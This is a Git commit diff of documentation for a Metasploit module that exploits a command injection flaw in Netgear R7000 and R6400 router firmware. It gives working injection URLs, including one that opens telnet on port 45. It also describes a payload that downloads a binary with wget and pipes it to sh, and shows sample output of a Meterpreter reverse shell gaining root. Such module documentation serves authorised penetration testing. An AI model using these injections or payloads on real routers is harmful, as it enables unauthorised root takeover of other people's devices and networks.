Update netgear_r7000_cgibin_exec.md

bug/bundler_fix
Carter 2017-03-24 15:43:06 -04:00 committed by GitHub
parent 69769b1ca4
commit dd974612e8
1 changed files with 23 additions and 31 deletions

View File

@ -1,4 +1,4 @@
The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router.
The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
## Vulnerable Application
@ -12,47 +12,39 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
3. Do: `set RHOST <RouterIP>`
4. Do: `set PAYLOAD <payload>`
5. Do: `run`
6. If the router is a R7000 or R6400, the module should run
6. If the router is a R7000 or R6400, you should get a session
## Options
**PAYLOAD**
The valid payloads are `cmd/unix` payloads _only_, as this is a command execution module
The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
## Scenarios
Sample output of the options looks like so
Sample output of a successful session:
```
msf exploit(netgear_r7000_cgibin_exec) > options
msf exploit(netgear_r7000_cgibin_exec) > run
Module options (exploit/linux/http/netgear_r7000_cgibin_exec):
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Router is a NETGEAR router (R7000)
[+] Router may be vulnerable (NETGEAR R7000)
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://[redacted]:8080/
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54168) at 2017-03-10 15:56:21 -0600
[*] Server stopped.
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.1 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.34 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(netgear_r7000_cgibin_exec) >
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 192.168.1.4
OS : (Linux 2.6.36.4brcmarm+)
Architecture : armv7l
Meterpreter : armle/linux
meterpreter >
```
As you can see, the `uid` is 0, meaning you have root access.